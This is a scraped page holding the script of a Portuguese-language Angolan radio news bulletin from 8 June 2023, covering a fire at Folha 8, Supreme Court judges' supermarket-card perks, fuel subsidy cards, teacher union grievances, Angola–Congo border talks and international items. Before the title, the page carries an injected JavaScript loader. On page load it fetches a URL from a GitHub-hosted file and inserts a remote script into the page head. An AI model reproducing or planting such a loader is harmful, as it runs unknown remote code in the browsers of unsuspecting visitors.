;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 08 de Junho de 2023 | RadioPlayDigital
Jornal 12h, edição de 08 de Junho de 2023

INCENDIO DESTROE INSTALAÇOES DO FOLHA OITO. DIRECÇAO DA PUBLICAÇAO GRARANTE REGRESSO  EM BREVE. 

JUIZES DO TRIBUNAL SUPREMO COM AUMENTO DE SALARIOS E BENESSES. FUNDO MENSAL SERA DE 76º MIL KUANZAS E MAIS SUBSIDIOS. 

FEDERAÇAO DE SINDICATOS DE EDUCAÇAO, CULTURA E DESPORTO   LEVA LAMENTOS A MINISTRA DA EDUCAÇAO. EM CAUSA AUMENTO DO PREÇO DO COMBUSTIVEL E TRANSPORTES PUBLICOS.

FUNÇAO PUBLICA VOLTA A RECLAMAR ATRASO SALARIAL. 

CONTENÇAO A IMIGRAÇÃO ILEGAL MOBILIZA MINISTERIOS DO INTERIORES DE ANGOLA E CONGO BRAZZAVILLE. 

JINGLE MIX

Jornal ao meio-dia de oito de Junho de 2023. Coordenação de Alves Fernandes, técnica de Edson Machado e Edmundo Simões…

JINGLE MVIEIRA 

Um incêndio deflagrou, na madrugada de terça-feira, nas instalações da TV8 e da Folha 8, em Luanda, tendo queimado inúmeros equipamentos e registado um prejuízo equivalente a mais de 50 mil dólares. 

Entre as perdas constam computadores, câmaras e estúdios de edição, além de outros danos materiais.  As razões do incêndio ainda estão por apurar.

O director do Folha 8, William Tonet falou a MFM sobre os danos ao seu escritório.  

WTONET 1

WILLIAM TONET disse que com este incendio a produção diária do jornal e a edição central do fim de semana

WILLIAM TONET 2 

PONTO

Os juízes conselheiros do Tribunal Supremo de Angola vão receber um cartão de supermercado com um plafond mensal que ronda os 760 mil kwanzas.

Informações indicam que o presidente do Tribunal Supremo, Joel Leonardo, autorizou a realização de um concurso limitado por convite para aquisição de “víveres e outros géneros alimentícios”, num valor estimado em 210 milhões de kwanzas, cerca de 345 mil dólares norte-americanos. 

Informação disponível avança que o procedimento se destina à aquisição de cartões de supermercado para distribuir pelos juízes conselheiros da mais alta instância da jurisdição comum do poder judiciário de Angola.

O analista MFM, Carlos Rosado de Carvalho mostra se contra e recorda as propostas anteriores.

CARLOS PROPOSTAS 1 

Os juízes conselheiros, auferem mensalmente um vencimento-base, suplementos, prestações sociais, diuturnidades, abonos complementares e extraordinários previstos na lei, que integram abono para despesas de representação, subsídio de férias, ajudas de custo e subsídio diário, subsídio de instalação, subsídio de risco, subsídio de chefia e subsídio de atavio. 

Carlos Rosado de Carvalho aponta as contas dos juízes e onde poderá haver incrementos.

CARLOS ROSADO CONTAS DOS JUIZES 1 

Incluem igualmente, para além da casa de função ou subsídio de renda, passaporte diplomático e serviço protocolar, viatura do Estado para apoio às necessidades de casa, dois motoristas, um cozinheiro, uma lavadeira, e empregada doméstica. 

Na reação do jurista Manuel Cangundo disse que a situação e inaceitável e justifica.  

MANUEL CANGUNDO 12H 

O analista MFM, Carlos Rosado de Carvalho, faz a comparação com outras paragens para incentivar a imprensa a apurar mais sobre o aumento das benesses dos juízes conselheiros do tribunal supremo.

CARLOS ROSADO COMPARAÇAO 3

A opinião publica critica a atribuição destas benesses aos juízes conselheiros. Os entrevistados da MFM falaram ao microfone da jornalista Maria Umba.

MARIA UMBA 12H SUBSIDIOS JUIZES 

PONTO ECONOMIA

Dois mil e 368 operadores dos serviços de táxi, moto-táxis e de embarcações de pesca artesanal licenciados, na província de Luanda, receberam o cartão de subsídios de gasolina, desde o início do processo no quadro isenção do novo preço da gasolina de 300 kwanzas.

A capital do país tem em processo de emissão cerca de 23 mil solicitações, junto dos bancos, com o objectivo de alcançar a meta de 100 % de cartões distribuídos aos operadores licenciados, até ao final do presente mês.

Estes dados constam de uma nota de imprensa conjunta dos ministérios dos Transportes e das Finanças, que refere que o processo decorre de forma célere.

Estes operadores de transporte público, a nível do país, vão continuar a beneficiar da subvenção do Estado, comprando a gasolina no antigo valor de 160 kwanzas, ao contrário do actual 300 kwanzas, por litro, com o intuito de manterem a tarifa por viagem.

A referida nota comunicativa recorda que os cartões são de uso exclusivo para o abastecimento de gasolina, possuem elementos de identificação como a matrícula do veículo e o tipo de combustível e intransmissíveis.

Para o efeito, os cartões foram entregues nas direcções municipais de transportes, tráfego e mobilidade urbana das administrações municipais, bem como nas direcções municipais de agricultura e pescas, de cada província, para aos beneficiários.

O informe realça que a grande maioria dos taxistas e moto-taxistas licenciados não dispõe dos respectivos cartões e, por este motivo, assumirão os encargos no abastecimento até que venham a recebê-los.

….

Sobre a situação social dos professores e outros agentes de educação, a federação vai ao encontro esta manhã da ministra da educação. 

Um dos grandes problemas pende sobre a mobilidade da classe docente.

Esta preocupação será levada as autoridades no sentido de se rever os salários. 

A questão do subsídio estará em cima da mesa. O IRT, os subsídios e direção e chefia são alguns dos problemas tal como refere e Zacarias Jeremias da Federação do Sindicato dos Trabalhadores da Educação, Cultura, Desporto e Comunicação Social de Angola. 

ZACARIAS JEREMAIS 12H COMBUSTIVEIS… 

O sindicalista disse ainda que continua as reclamações em relação as preocupações apresentadas no caderno reivindicativo. 

ZACARIAIS JEREMIAS 12H SUBSIDIOS … 

O SIMPROF apresentou hoje o seu descontentamento devido a um gritante atraso salarial que se regista a mais um mês. 

Admar Juguma, secretario geral do SIMPROF disse que a situação já esta a ser acautelada junto do governo.

ADEMAR JINGUMA 12 H SALARIOS  

O secretario geral do SIMPROF. Ademar Jiguma, apela ainda a melhoria do nível de diálogo entre os professores e as autoridades para a melhoria do sistema de educação.

ADEMAR JINGUMA 2 

PONTO

A Presidente do Conselho de Administração da Assembleia Nacional (AN), Suzana Augusto, constatou hoje, quarta-feira, na cidade do Uíge, o grau de funcionamento do Gabinete de Apoio ao Círculo Eleitoral Provincial de Deputados.

Durante o encontro, Suzana Augusto Melo recebeu explicações detalhadas sobre o funcionamento do Gabinete local de Apoio ao Círculo Eleitoral Provincial de Deputados.

A insuficiência de quadros, de verbas para a manutenção das instalações, promoções de categoria, subsídios de deslocação e outras dificuldades foram apresentados como principais constrangimentos.

Em declarações à imprensa, Suzana Augusto Melo considerou positiva a visita às instalações do Uíge, tendo referido que estão bem conservadas e com condições de acomodação dos cinco deputados.

A Presidente do Conselho de Administração da Assembleia Nacional manteve, igualmente, encontro com o governador provincial do Uíge, José Carvalho da Rocha.

O actual Gabinete local de Apoio ao Círculo Eleitoral Provincial de Deputados do Uíge funciona desde 2015

PONTO 

A província de Cabinda acolhe até sábado a reunião bilateral entre Angola e a República do Congo, no domínio de Defesa, Segurança e Gestão de Fronteira.

A reunião foi antecedida pelo encontro de peritos ligados aos órgãos de Defesa e Segurança de ambos países, que deverão produzir documentos consensuais, dentro de três dias. 

Os papéis serão submetidos à reunião de ministros a acontecer no fim de semana, tal como revela o superintendente Vasco da Gama, porta-voz do encontro.

VASCO DA GAMA POLÍCIA ENCONTRO 12H  

No entanto, na abertura do encontro, o secretário de Estado para Defesa Nacional e Coordenador da sessão de peritos da parte angolana, José   Maria de Lima, destacou a importância da reunião bilateral entre a República de Angola e da República do Congo e salientou que a mesma visa reforçar as acções que garantem a segurança comum.

INTERNACIONAL

O ministro dos Negócios Estrangeiros russo, Serguei Lavrov, assegurou hoje que a Rússia continua a cumprir os seus compromissos de exportar alimentos, fertilizantes e outros produtos para África, apesar dos obstáculos impostos pelo Ocidente.

O chefe da diplomacia russa sublinhou que a próxima cimeira Rússia-África, agendada para de 26 a 29 de julho em São Petersburgo, marcará “o vetor do desenvolvimento das relações para os próximos anos”.

Lavrov agradeceu aos países africanos por “não permitirem que os envolvam na campanha antirrussa” e por tomarem “uma posição equilibrada em relação à crise de segurança europeia”, referindo-se à guerra na Ucrânia.

Num exemplo do compromisso com África, a porta-voz do Ministério dos Negócios Estrangeiros, María Zajárova, anunciou hoje o próximo envio de 34.000 toneladas de fertilizantes para a Nigéria, o terceiro país africano a receber fertilizantes gratuitos da Rússia.

Na semana passada, Moscovo anunciou o transporte de 34.000 toneladas para o Quénia, a que se devem somar as 20.000 enviadas em março para o Malaui.

O líder da Coreia do Norte terá emitido uma ordem secreta para que o suicídio seja proibido no país.

O ditador Kim Jong-Un considera o ato como uma “traição ao socialismo” e ordenou aos governos locais que tomassem medidas preventivas contra esta ação, indicam relatórios citados pelo The Mirror.

Na Coreia do Norte, o número de cidadãos que se suicidam tem vindo a aumentar. Dados de uma agência de espionagem indicam que o número de suicídios aumentou em 40% este ano, comparado com o ano passado.

A ordem confidencial de suicídio foi dada numa série de reuniões de emergência em todo o país, informou a Radio Free Asia.

Data de Emissão: 08-06-2023 às 12:00
Género(s): Noticiário
 
PARTICIPANTES

Relacionados